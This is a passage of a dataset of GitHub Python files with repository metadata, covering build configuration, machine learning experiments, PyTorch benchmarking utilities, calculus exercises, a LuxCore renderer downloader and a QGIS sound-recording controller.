'gcc'\n AR = PREFIX + 'ar'\n CXX = PREFIX + 'g++'\n LINK = PREFIX + 'gcc'\n TARGET_EXT = 'elf'\n SIZE = PREFIX + 'size'\n OBJDUMP = PREFIX + 'objdump'\n OBJCPY = PREFIX + 'objcopy'\n STRIP = PREFIX + 'strip'\n\n DEVICE = ' -march=armv7-a -marm -msoft-float'\n CFLAGS = DEVICE + ' -Wall'\n AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp -D__ASSEMBLY__ -I.'\n LINK_SCRIPT = 'link.lds'\n LFLAGS = DEVICE + ' -nostartfiles -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,system_vectors'+\\\n ' -T %s' % LINK_SCRIPT\n\n CPATH = ''\n LPATH = ''\n\n # generate debug info in all cases\n AFLAGS += ' -gdwarf-2'\n CFLAGS += ' -g -gdwarf-2'\n\n if BUILD == 'debug':\n CFLAGS += ' -O0'\n else:\n CFLAGS += ' -O2'\n\n CXXFLAGS = CFLAGS + ' -Woverloaded-virtual -fno-exceptions -fno-rtti'\n\n M_CFLAGS = CFLAGS + ' -mlong-calls -fPIC '\n M_CXXFLAGS = CXXFLAGS + ' -mlong-calls -fPIC'\n M_LFLAGS = DEVICE + CXXFLAGS + ' -Wl,--gc-sections,-z,max-page-size=0x4' +\\\n ' -shared -fPIC -nostartfiles -nostdlib -static-libgcc'\n M_POST_ACTION = STRIP + ' -R .hash $TARGET\\n' + SIZE + ' $TARGET \\n'\n\n POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\\n' +\\\n SIZE + ' $TARGET \\n'\n","repo_name":"RT-Thread/rtthread-specification","sub_path":"smp_skeleton/rtconfig.py","file_name":"rtconfig.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"5"} +{"seq_id":"4682290532","text":"from consts import *\nfrom custom_types import TransitionFunction\nfrom turing_machine import TuringMachine\n\n\nclass FirstMachine(TuringMachine):\n \"\"\"\n A machine to compute the sequence 0 1 0 1 0 1... (0 1 0...)\n It never reaches the final state.\n https://en.wikipedia.org/wiki/Turing_machine_examples\n \"\"\"\n def __init__(self,\n tape_string: str = \"\",\n transition_function: TransitionFunction = None,\n *args,\n **kwargs):\n\n if transition_function is None:\n transition_function = {\n (STATE_0, SYMBOL_BLANK): (STATE_1, SYMBOL_0, MOVE_HEAD_RIGHT),\n (STATE_1, SYMBOL_BLANK): (STATE_3, SYMBOL_BLANK, MOVE_HEAD_RIGHT),\n (STATE_3, SYMBOL_BLANK): (STATE_4, SYMBOL_1, MOVE_HEAD_RIGHT),\n (STATE_4, SYMBOL_BLANK): (STATE_0, SYMBOL_BLANK, MOVE_HEAD_RIGHT),\n }\n\n super().__init__(tape_string=tape_string,\n transition_function=transition_function,\n initial_state=STATE_0,\n final_states=set(),\n tape_alphabet={SYMBOL_BLANK, SYMBOL_0, SYMBOL_1},\n input_symbols={SYMBOL_BLANK, SYMBOL_0, SYMBOL_1},\n *args,\n **kwargs)\n","repo_name":"mikgor/Turing-Machines","sub_path":"machines/first_machine.py","file_name":"first_machine.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44148006738","text":"import copy\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy as sp\r\nfrom scipy.special import logit,expit\r\nimport time\r\nfrom numpy import random,linalg,corrcoef,ones,float32,float64,c_,exp,log\r\nfrom numpy import zeros,mean,where,array,unique,equal\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\n\r\nfrom mnist import MNIST\r\nmndata = MNIST('/mnist/')\r\nimages, labels = mndata.load_training()\r\ny=np.array(labels).astype(float32)\r\nx=np.array(images).astype(float32)\r\ni0=y==0\r\nin0=y!=0\r\ny[i0]=1.0\r\ny[in0]=0.0\r\nobs=x.shape[0]\r\nvars=x.shape[1]\r\nmi=min(y);y-=mi;ma=max(y);y/=ma;y*=0.98;y+=0.01\r\n\r\n\r\nt1=time.time();neurons=1000;xx=c_[ones((obs,1),float32), x];yy=logit(y);\r\nikeep=round(1.2*obs/neurons)\r\nw=zeros((vars+1,neurons),float32)\r\nt1=time.time()\r\nfor i in range(neurons):\r\n ira=random.randint(0, obs, ikeep)\r\n w[:,i],res1,rank1,s1=linalg.lstsq(xx[ira,:],yy[ira],rcond=-1)\r\n print(\"w-\",i)\r\nt2=time.time()\r\nlayer1=expit(xx @ w)\r\nt2-t1\r\n\r\nv,res1,rank1,s1=linalg.lstsq(layer1,y,rcond=-1)\r\npred=layer1@v\r\nplt.scatter(y,pred)\r\nco=np.corrcoef(pred,y)[0,1]\r\nmo=mean(abs(pred-y))\r\nmse=mean((pred-y)**2)\r\nprint(\"LinearRegression\",co,\" \",mo,\" \",mse)\r\npred=np.round(pred)\r\ny=np.round(y)\r\niok=y==1\r\niok2=y[iok]==pred[iok]\r\nsum(iok2)/sum(iok)\r\nii=np.round(pred)==np.round(y)\r\n100*sum(ii)/len(y)\r\n\r\n\r\n# TEST\r\nimages, labels = mndata.load_testing()\r\nyt=np.array(labels).astype(float32)\r\nxt=np.array(images).astype(float32)\r\ni0=yt==0\r\nin0=yt!=0\r\nyt[i0]=1.0\r\nyt[in0]=0.0\r\nobst=xt.shape[0]\r\nyt-=mi;yt/=ma;yt*=0.98;yt+=0.01\r\nxxt=c_[ones((obst,1),float32), xt]\r\nlayer1t=expit(xxt@w)\r\npredt=layer1t@v\r\nco=np.corrcoef(predt,yt)[0,1]\r\nmo=mean(abs(predt-yt))\r\nmse=mean((predt-yt)**2)\r\nprint(\"LinearRegression\",co,\" \",mo,\" \",mse)\r\nii=np.round(predt)==np.round(yt)\r\n100*sum(ii)/len(yt)\r\n\r\n\r\n00000\r\n\r\n","repo_name":"nbakas/ANNBN.jl","sub_path":"src/python_implementation/annbn_mnist.py","file_name":"annbn_mnist.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"17046638806","text":"\r\nclass Fruits:\r\n\r\n\tdef __init__(self, name, cost):\r\n\t\tself.name = name\r\n\t\tself.cost = cost\r\n\r\n\tdef Print(self):\r\n\t\tprint(self.name)\r\n\r\nApple = Fruits('Apple', 300)\r\nOrange = Fruits('Orange', 140)\r\n\r\nkey = Fruits.Print #This is same like (key = lambda x : x.Print()) where x is Apple or Orange.\r\nkey(Apple) #This works however Apple.key() does not, which says that the key is not the method of this class.\r\n","repo_name":"Roshan2121/Python-Files","sub_path":"Python oop/lambdaFunction.py","file_name":"lambdaFunction.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14874552675","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 9 04:12:38 2017\r\n\r\n@author: dariu\r\n\"\"\"\r\n\r\nimport os \r\nimport csv\r\nimport GoogleRoute\r\n\r\ndef getTimes(fileA, fileB):\r\n #os.chdir('C:\\\\Users\\\\Ronan Perry\\\\Documents\\\\JHU\\\\Medhacks\\\\Python Scripts')\r\n os.chdir('C:\\\\Users\\\\dariu\\\\OneDrive - Johns Hopkins University\\\\Documents\\\\MedHacks')\r\n \r\n with open(fileA, encoding='utf-8-sig') as A:\r\n csvA = list(csv.reader(A))\r\n with open(fileB, encoding='utf-8-sig') as B:\r\n csvB = list(csv.reader(B))\r\n \r\n csvNew = []\r\n for j in csvA:\r\n min_time = GoogleRoute.route(j,csvB)\r\n if min_time == None:\r\n return csvNew\r\n else:\r\n csvNew.append(min_time)\r\n \r\n return csvNew\r\n \r\na = getTimes('latlongA.csv','Community_Health_Centers.csv')\r\n\r\nwith open('min_time_map.csv', 'w') as min_time_map:\r\n b = csv.writer(min_time_map, delimiter=',')\r\n b.writerows(a)\r\n min_time_map.close()\r\n \r\n'''\r\nwith open('min_time.csv', 'w') as min_time:\r\n b = csv.writer(min_time, delimiter=',')\r\n B = []\r\n for i in a:\r\n C = i[0]\r\n if len(C) > 0:\r\n B.append(C)\r\n b.writerows(B)\r\n min_time.close()\r\n\r\nwith open('A_latlon.csv', 'w') as A_latlon:\r\n c = csv.writer(A_latlon, delimiter=',')\r\n E = []\r\n for i in a:\r\n C = i[0]\r\n #if len(C) > 0:\r\n E.append(C)\r\n c.writerows(E)\r\n A_latlon.close() \r\n \r\nwith open('B_latlon.csv', 'w') as B_latlon:\r\n d = csv.writer(B_latlon, delimiter=',')\r\n G = []\r\n for i in a:\r\n F = i[4][5]\r\n #if len(F) > 0:\r\n G.append(F) \r\n d.writerows(G)\r\n B_latlon.close() \r\n'''","repo_name":"guojoanna/Maptimize","sub_path":"Code/min_path.py","file_name":"min_path.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74257364632","text":"import time\nimport torch\nimport argparse\nimport json\nfrom dataclasses import asdict\nfrom torchbenchmark.e2e import E2EBenchmarkResult, load_e2e_model_by_name\nfrom typing import Dict\n\nSUPPORT_DEVICE_LIST = [\"cpu\", \"cuda\"]\n\ndef run(func) -> Dict[str, float]:\n if torch.cuda.is_available():\n torch.cuda.synchronize()\n result = {}\n # Collect time_ns() instead of time() which does not provide better precision than 1\n # second according to https://docs.python.org/3/library/time.html#time.time.\n t0 = time.time_ns()\n func()\n if torch.cuda.is_available():\n torch.cuda.synchronize()\n t2 = time.time_ns()\n result[\"latency_ms\"] = (t2 - t0) / 1_000_000.0\n return result\n\ndef gen_result(m, run_result):\n num_epochs = getattr(m, \"num_epochs\", 1)\n r = E2EBenchmarkResult(device=m.device, device_num=m.device_num,\n test=m.test, num_examples=m.num_examples,\n num_epochs=num_epochs, batch_size=m.batch_size, result=dict())\n r.result[\"latency\"] = run_result[\"latency_ms\"] / 1000.0\n r.result[\"qps\"] = r.num_examples / r.result[\"latency\"] * r.num_epochs\n # add accuracy result if available\n if hasattr(m, \"accuracy\"):\n r.result[\"accuracy\"] = m.accuracy\n return r\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(__doc__)\n parser.add_argument(\"model\", help=\"Full name of the end-to-end model.\")\n parser.add_argument(\"-t\", \"--test\", choices=[\"eval\", \"train\"], default=\"eval\", help=\"Which test to run.\")\n parser.add_argument(\"--bs\", type=int, help=\"Specify batch size.\")\n args, extra_args = parser.parse_known_args()\n\n found = False\n Model = load_e2e_model_by_name(args.model)\n if not Model:\n print(f\"Unable to find model matching {args.model}.\")\n exit(-1)\n m = Model(test=args.test, batch_size=args.bs, extra_args=extra_args)\n test = getattr(m, args.test)\n result = gen_result(m, run(test))\n result_json = json.dumps(asdict(result))\n print(result_json)\n","repo_name":"pytorch/benchmark","sub_path":"run_e2e.py","file_name":"run_e2e.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"5"} +{"seq_id":"9137266874","text":"from heapq import heapify, heappush, heappop\nN = int(input())\nA = list(map(int, input().split()))\n\nhq1, hq2 = [], []\nheapify(hq1)\nheapify(hq2)\ndp1 = [0]*(3*N)\ndp2 = [0]*(3*N)\nres = 0\nfor i in range(2*N):\n heappush(hq1, A[i])\n res += A[i]\n if len(hq1) > N:\n v = heappop(hq1)\n res -= v\n dp1[i] = res\nres = 0\nfor j in range(3*N-1, N-1, -1):\n heappush(hq2, -A[j])\n res += A[j]\n if len(hq2) > N:\n v = heappop(hq2)\n res += v\n dp2[j] = res\nans = -(1 << 60)\nfor i in range(N-1, 2*N):\n ans = max(ans, dp1[i]-dp2[i+1])\nprint(ans)\n","repo_name":"Nikkuniku/AtcoderProgramming","sub_path":"ABC/ABC001~ABC099/ABC062/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18771130657","text":"import os\nimport sys\nimport requests\nimport platform\nimport site\nfrom importlib import reload\nimport OpenEXR, Imath\nimport numpy as np\nimport FreeCAD as App\nimport logging\n\n\nLUXCORE_LATEST = \"https://github.com/LuxCoreRender/LuxCore/releases/download/latest/\"\nURIS = {\n \"linux\" : LUXCORE_LATEST + \"luxcorerender-latest-linux64.tar.bz2\",\n \"darwin\" : LUXCORE_LATEST + \"luxcorerender-latest-mac64.dmg\",\n \"windows\" : LUXCORE_LATEST + \"luxcorerender-latest-win64.zip\",\n}\nCURRENT_SESSION = None\n\n\nloggerName = \"pyluxcore.tools\"\nlogger = logging.getLogger(loggerName)\nlogging.basicConfig(level=logging.WARNING,\n format=\"[%(threadName)s][%(asctime)s] %(message)s\")\n\n\ndef LuxCoreLogHandler(msg):\n logger.info(msg)\n\n\ndef get(folder=None):\n \"\"\"Returns the luxcore library if possible, None if it is not available\n\n Keyword arguments:\n folder -- The folder where it is supposed we are finding it. If None,\n App.getUserAppDataDir() will be used\n\n Returns:\n The luxcore library, None if there is no such library\n \"\"\"\n folder = os.path.join(folder or App.getUserAppDataDir(), 'LuxCore')\n if not os.path.isdir(folder):\n return None\n if folder not in sys.path:\n sys.path.append(folder)\n reload(site)\n try:\n import pyluxcore\n return pyluxcore\n except ImportError:\n print(\"ImportError\", sys.path)\n pass\n return None\n\n\ndef download(folder=None):\n \"\"\"Download the latest available LuxCore\n\n Keyword arguments:\n folder -- The folder where it will be downloaded. If None,\n App.getUserAppDataDir() will be used\n\n Returns:\n The luxcore library, None if there is no such library\n \"\"\"\n pyluxcore = get(folder)\n if pyluxcore is not None:\n return pyluxcore\n\n folder = folder or App.getUserAppDataDir()\n uri = URIS[platform.system().lower()]\n fname = os.path.basename(uri)\n _, ext = os.path.splitext(fname)\n App.Console.PrintMessage(\"Downloading '{}' in '{}'...\\n\".format(uri, folder))\n data = requests.get(uri, allow_redirects=True)\n with open(os.path.join(folder, fname), 'wb') as f:\n f.write(data.content)\n\n if ext == \".bz2\":\n import tarfile\n tf = tarfile.open(os.path.join(folder, fname), 'r:bz2')\n tf.extractall(path=folder)\n elif ext == \".zip\":\n import zipfile\n tf = zipfile.ZipFile(os.path.join(folder, fname))\n tf.extractall(path=folder)\n elif ext in [\".7z\", \".7zip\", \".dmg\"]:\n import py7zr \n tf = py7zr.SevenZipFile(os.path.join(folder, fname), mode='r')\n tf.extractall(path=folder)\n\n return get(folder)\n\n\ndef run_sim(folder, cfg=\"render.cfg\", scn=\"scene.scn\", pyluxcore=None,\n refresh_interval=2500):\n pyluxcore = pyluxcore or download()\n pyluxcore.Init(LuxCoreLogHandler)\n cmd_props = pyluxcore.Properties()\n cmd_props.Set(pyluxcore.Property(\"scene.file\", scn))\n cmd_props.Set(pyluxcore.Property(\"screen.tool.type\", \"IMAGE_VIEW\"))\n\n os.chdir(folder)\n\n cfg_props = pyluxcore.Properties(cfg)\n cfg_props.Set(cmd_props);\n config = pyluxcore.RenderConfig(cfg_props)\n\n config.Parse(pyluxcore.Properties().Set(\n pyluxcore.Property(\"screen.refresh.interval\", refresh_interval)))\n\n session = pyluxcore.RenderSession(config, None, None)\n session.Start()\n\n global CURRENT_SESSION\n CURRENT_SESSION = session\n\n return session\n\n\ndef get_imgs(folder, session=CURRENT_SESSION):\n if session is None:\n return None\n\n session.GetFilm().Save()\n\n pt = Imath.PixelType(Imath.PixelType.FLOAT)\n exr = OpenEXR.InputFile(os.path.join(folder, \"oidn.exr\"))\n dw = exr.header()['dataWindow']\n size = (dw.max.x - dw.min.x + 1, dw.max.y - dw.min.y + 1)\n imgs = []\n for channel in ('R', 'G', 'B'):\n img = np.frombuffer(exr.channel(channel, pt), dtype=np.float32)\n img.shape = (size[1], size[0])\n imgs.append(img)\n return imgs\n","repo_name":"sanguinariojoe/freecad.xray","sub_path":"freecad/xray/xrayUtils/LuxCore.py","file_name":"LuxCore.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74257695192","text":"\"\"\"\nUtilities for building pytorch and torch* domain packages\n\"\"\"\nimport os\nimport sys\nimport shutil\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Dict\n\nCLEANUP_ROUND = 5\n\n@dataclass\nclass TorchRepo:\n name: str\n origin_url: str\n main_branch: str\n src_path: Path\n cur_commit: str\n build_command: List[str]\n\ndef setup_bisection_build_env(env: Dict[str, str]) -> Dict[str, str]:\n env[\"USE_CUDA\"] = \"1\"\n env[\"BUILD_CAFFE2_OPS\"] = \"0\"\n # Do not build the test\n env[\"BUILD_TEST\"] = \"0\"\n env[\"USE_MKLDNN\"] = \"1\"\n env[\"USE_MKL\"] = \"1\"\n env[\"USE_CUDNN\"] = \"1\"\n # Do not depend on ffmpeg, which requires conda-forge\n env[\"USE_FFMPEG\"] = \"0\"\n # Torchaudio SOX build has failures, skip it\n env[\"BUILD_SOX\"] = \"0\"\n # Disable Torchaudio KALDI build\n env[\"BUILD_KALDI\"] = \"0\"\n env[\"CMAKE_PREFIX_PATH\"] = env[\"CONDA_PREFIX\"]\n return env\n\ndef _print_info(info: str):\n print(f\"=========================== {info} ===========================\", flush=True)\n\ndef build_pytorch_repo(repo: TorchRepo, build_env: Dict[str, str]):\n # Check if version.py exists, if it does, remove it.\n # This is to force pytorch to update the version.py file upon incremental compilation\n version_py_path = os.path.join(repo.src_path.absolute(), \"torch/version.py\")\n if os.path.exists(version_py_path):\n os.remove(version_py_path)\n try:\n subprocess.check_call(repo.build_command, cwd=repo.src_path.absolute(), env=build_env)\n command_testbuild = [sys.executable, \"-c\", \"'import torch'\"]\n subprocess.check_call(command_testbuild, cwd=os.environ[\"HOME\"], env=build_env)\n except subprocess.CalledProcessError:\n _print_info(f\"BUILDING {repo.name.upper()} commit {repo.cur_commit} 2ND TRY\")\n # Remove the build directory, then try building it again\n build_path = os.path.join(repo.src_path.absolute(), \"build\")\n if os.path.exists(build_path):\n shutil.rmtree(build_path)\n subprocess.check_call(repo.build_command, cwd=repo.src_path.absolute(), env=build_env)\n\ndef build_repo(repo: TorchRepo, build_env: Dict[str, str]):\n _print_info(f\"BUILDING {repo.name.upper()} commit {repo.cur_commit} START\")\n if repo.name == \"pytorch\":\n build_pytorch_repo(repo, build_env)\n else:\n subprocess.check_call(repo.build_command, cwd=repo.src_path, env=build_env)\n _print_info(f\"BUILDING {repo.name.upper()} commit {repo.cur_commit} END\")\n\ndef cleanup_torch_packages(pkgs: List[str]=[]):\n if not len(pkgs):\n pkgs = [\"torch\", \"torchvision\", \"torchaudio\", \"torchdata\"]\n for _ in range(CLEANUP_ROUND):\n command = \"pip uninstall -y \" + \" \".join(pkgs) + \" || true\"\n subprocess.check_call(command, shell=True)\n","repo_name":"pytorch/benchmark","sub_path":"utils/build_utils.py","file_name":"build_utils.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"5"} +{"seq_id":"30688481450","text":"from sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import f1_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import PredefinedSplit\nimport sys\nsys.path.append(\"../\")\nfrom data_processor import Data\n\nclass GaussianNaiveBayesClassifier():\n def __init__(self,training_data_x,training_data_y):\n self.training_data_x = training_data_x\n self.training_data_y = training_data_y\n self.initialize_classifier()\n\n def initialize_classifier(self,**kwargs):\n self.classifier = GaussianNB(**kwargs)\n\n def train(self):\n self.classifier.fit(self.training_data_x,self.training_data_y)\n\n def predict(self,sample_x):\n return self.classifier.predict(sample_x)\n\n def get_f1_measure(self,sample_x,sample_y):\n predictions = self.predict(sample_x)\n score = f1_score(\n y_true=sample_y,\n y_pred=predictions,\n average=\"micro\"\n )\n return score\n\n\n def find_best_params(self,validation_data_x,validation_data_y,n_jobs=1,params=[]):\n if not params:\n params = self.get_default_param_grid()\n\n merged_x = Data.merge_arrays(self.training_data_x, validation_data_x)\n merged_y = Data.merge_arrays(self.training_data_y, validation_data_y)\n test_fold = []\n\n for i in range(0,len(self.training_data_y)):\n test_fold.append(1)\n for i in range(0,len(validation_data_y)):\n test_fold.append(0)\n\n cv = PredefinedSplit(test_fold)\n\n gs = GridSearchCV(\n estimator=GaussianNB(),\n scoring='f1_micro',\n param_grid=params,\n n_jobs=n_jobs,\n cv=cv\n )\n\n gs.fit(merged_x,merged_y)\n\n best_params = gs.best_params_\n results = gs.cv_results_\n return best_params,results\n\n def get_default_param_grid(self):\n var_smoothing = []\n smoothing = 0.00000000001\n while smoothing<1:\n var_smoothing.append(smoothing)\n smoothing*=10\n return {\"var_smoothing\":var_smoothing}","repo_name":"tahasalman/SentimentAnalysis","sub_path":"Classifiers/gnb.py","file_name":"gnb.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26614750830","text":"import sympy as sp \r\n\r\nx = sp.symbols('x')\r\n\r\n#cau a -----------------------------------------\r\nfa = 3*x**4 - 16*x**3 + 18*x**2 - 9\r\n\r\ndfa = sp.diff(fa, x)\r\ndfa2 = sp.diff(fa, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfa, x))\r\n\r\nfor i in sp.solve(dfa, x):\r\n if dfa2.subs(x, i) > 0:\r\n print(\"fa has a local minimum at\", i)\r\n elif dfa2.subs(x, i) < 0:\r\n print(\"fa has a local maximum at\", i)\r\n else:\r\n print(\"fa is not define\")\r\n\r\n#cau b -----------------------------------------\r\nfb = (x + 2)/(2*x**2)\r\n\r\ndfb = sp.diff(fb, x)\r\ndfb2 = sp.diff(fb, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfb, x))\r\n\r\nfor i in sp.solve(dfb, x):\r\n if dfb2.subs(x, i) > 0:\r\n print(\"fb has a local minimum at\", i)\r\n elif dfb2.subs(x, i) < 0:\r\n print(\"fb has a local maximum at\", i)\r\n else:\r\n print(\"fb is not define\")\r\n\r\n#cau c -----------------------------------------\r\nfc = -(x**2)/3 + x**2 + 3*x + 4\r\n\r\ndfc = sp.diff(fc, x)\r\ndfc2 = sp.diff(fc, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfc, x))\r\n\r\nfor i in sp.solve(dfc, x):\r\n if dfc2.subs(x, i) > 0:\r\n print(\"fc has a local minimum at\", i)\r\n elif dfc2.subs(x, i) < 0:\r\n print(\"fc has a local maximum at\", i)\r\n else:\r\n print(\"fc is not define\")\r\n\r\n#cau d -----------------------------------------\r\nfd = (5*x**2 + 5)/x\r\n\r\ndfd = sp.diff(fd, x)\r\ndfd2 = sp.diff(fd, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfd, x))\r\n\r\nfor i in sp.solve(dfd, x):\r\n if dfd2.subs(x, i) > 0:\r\n print(\"fd has a local mimimum at\", i)\r\n elif dfd2.subs(x, i) < 0:\r\n print(\"fd has a local maximum at\", i)\r\n else:\r\n print(\"fd is not define\")\r\n\r\n","repo_name":"giahao1411/TDTU-Projects","sub_path":"All-Labs/Python-Labs/Calculus/lab9/cau2.py","file_name":"cau2.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26017471385","text":"# coding: utf8\n\n__contact__ = \"info@hytech-imaging.fr\"\n__copyright__ = \"Copyright (c) 2021 Hytech Imaging\"\n\nimport os.path\nfrom .thread_sound_recording import ThreadForSoundRecording\nfrom qgis.PyQt.QtCore import pyqtSignal, QObject\nfrom datetime import datetime\n\n\nclass SammoSoundRecordingController(QObject):\n onStopSoundRecordingForEventSignal = pyqtSignal(bool, str, str, str)\n onSoundRecordingStatusChanged = pyqtSignal(bool)\n\n def __init__(self):\n super().__init__()\n self._workingDirectory: str = None\n self._threadSoundRecording = self._createSoundRecording()\n self._currentSoundFileName: str = None\n self._startTimerOnRecordForCurrentEvent: float = None\n self._isCurrentEventAnObservation: bool = None\n\n def unload(self):\n if self._threadSoundRecording.isProceeding:\n self._onAutomaticStopRecordingTimerEnded()\n\n def onStartObservation(self):\n self._onStartEventWhichNeedSoundRecord(True)\n\n def onStartEnvironment(self):\n self._onStartEventWhichNeedSoundRecord(False)\n\n def hardStopOfRecording(self):\n self._threadSoundRecording.stop()\n self._currentSoundFileName = None\n self.onSoundRecordingStatusChanged.emit(False)\n\n def _onStartEventWhichNeedSoundRecord(self, isObservation: bool):\n if not self._threadSoundRecording.isProceeding:\n # on start observation when no sound recording is in progress\n self._isCurrentEventAnObservation = isObservation\n self._startRecording(isObservation)\n\n else:\n if self._isCurrentEventAnObservation == isObservation:\n self._startSameEventWhenRecordingIsInProgress(isObservation)\n else:\n self._stopRecording()\n self._isCurrentEventAnObservation = isObservation\n self._startRecording(isObservation)\n\n def _startSameEventWhenRecordingIsInProgress(self, isObservation: bool):\n # on start same event when sound recording is in progress\n self._threadSoundRecording.setAutomaticStopTimerSignal.emit(\n -1\n ) # cancel automatic stop\n soundEnd = \"{:.1f}\".format(self._threadSoundRecording.recordTimer_s())\n if self._startTimerOnRecordForCurrentEvent > 0:\n soundStart = \"{:.1f}\".format(\n self._startTimerOnRecordForCurrentEvent\n )\n else:\n soundStart = \"0\"\n if isObservation:\n self._finalizeObservation(\n self._currentSoundFileName, soundStart, soundEnd\n )\n else:\n self._finalizeEnvironment(\n self._currentSoundFileName, soundStart, soundEnd\n )\n self._startTimerOnRecordForCurrentEvent = (\n self._threadSoundRecording.recordTimer_s()\n )\n\n def onStopEventWhichNeedSoundRecord(self):\n # on end observation or environment changes\n self._threadSoundRecording.setAutomaticStopTimerSignal.emit(15)\n\n def onNewSession(self, workingDirectory: str):\n self._workingDirectory = workingDirectory\n\n def _createSoundRecording(self) -> ThreadForSoundRecording:\n threadSoundRecording = ThreadForSoundRecording(\n self._onAutomaticStopRecordingTimerEnded\n )\n return threadSoundRecording\n\n def _startRecording(self, isObservation: bool):\n dateTimeObj = datetime.now()\n timeTxt = dateTimeObj.strftime(\"%Y%m%d_%H%M%S\")\n if isObservation:\n self._currentSoundFileName = (\n \"observation_sound_recording_{}.wav\".format(timeTxt)\n )\n else:\n self._currentSoundFileName = (\n \"environment_sound_recording_{}.wav\".format(timeTxt)\n )\n\n soundFilePath = os.path.join(\n self._workingDirectory, self._currentSoundFileName\n )\n self._startTimerOnRecordForCurrentEvent = 0\n self._threadSoundRecording.start(soundFilePath)\n\n self.onSoundRecordingStatusChanged.emit(True)\n\n def _onAutomaticStopRecordingTimerEnded(self):\n self._stopRecording()\n\n def _stopRecording(self):\n soundEnd = \"{:.1f}\".format(self._threadSoundRecording.recordTimer_s())\n if self._startTimerOnRecordForCurrentEvent > 0:\n soundStart = \"{:.1f}\".format(\n self._startTimerOnRecordForCurrentEvent\n )\n else:\n soundStart = \"0\"\n\n if self._isCurrentEventAnObservation:\n self._finalizeObservation(\n self._currentSoundFileName, soundStart, soundEnd\n )\n else:\n self._finalizeEnvironment(\n self._currentSoundFileName, soundStart, soundEnd\n )\n\n self._threadSoundRecording.stop()\n self._currentSoundFileName = None\n self.onSoundRecordingStatusChanged.emit(False)\n\n def _finalizeEnvironment(\n self, soundFile: str, soundStart: str, soundEnd: str\n ):\n self._startTimerOnRecordForCurrentEvent = None\n self.onStopSoundRecordingForEventSignal.emit(\n False, soundFile, soundStart, soundEnd\n )\n\n def _finalizeObservation(\n self, soundFile: str, soundStart: str, soundEnd: str\n ):\n self._startTimerOnRecordForCurrentEvent = None\n self.onStopSoundRecordingForEventSignal.emit(\n True, soundFile, soundStart, soundEnd\n )\n","repo_name":"pblottiere/sammo-boat","sub_path":"src/core/sound_recording_controller.py","file_name":"sound_recording_controller.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"38865522118","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef animate_series(fk, M, N, xmin, ymin, xmax, ymax, n, exact):\n plt.axis([xmin, xmax, ymin, ymax])\n plt.xlabel('x')\n plt.ylabel('y')\n\n x = np.linspace(xmin, xmax, n)\n s = 0\n\n lines = plt.plot(x, fk(x, N), linewidth = 3)\n for k in range(M, N+1):\n s += fk(x, k)\n lines[0].set_ydata(s)\n plt.plot(x, exact(x),'g--')\n plt.draw()\n plt.pause(0.3)\n\n# Example sin(x):\nexact = lambda x: np.sin(x)\ndef fk(x,k):\n return (-1)**k * x**(2*k+1) / np.math.factorial(2*k+1)\nM = 0\nN = 40\nxmin = 0\nxmax = 13 * np.pi\nymin = -2\nymax = 2\nn = 100\nanimate_series(fk, M, N, xmin, ymin, xmax, ymax, n, exact)\n","repo_name":"AntonBrekke/Python","sub_path":"animate_taylor_series.py","file_name":"animate_taylor_series.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27096043027","text":"from params import RANDOM_SEED, LocationConfig, CreateDataConfig\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nfrom pathlib import Path\nimport face_recognition\nfrom tqdm import tqdm\nfrom PIL import Image\nimport pandas as pd\nimport numpy as np\nimport insightface\nimport fnmatch\nimport pickle\nimport torch\nimport cv2\nimport os\n\ndef create_new_data_directories(path):\n Path(path).mkdir(exist_ok=True, parents=True)\n Path(path + 'train').mkdir(exist_ok=True, parents=True)\n Path(path + 'test').mkdir(exist_ok=True, parents=True)\n Path(LocationConfig.crop_images).mkdir(exist_ok=True, parents=True)\n \ndef get_short_video_name(videoNames):\n 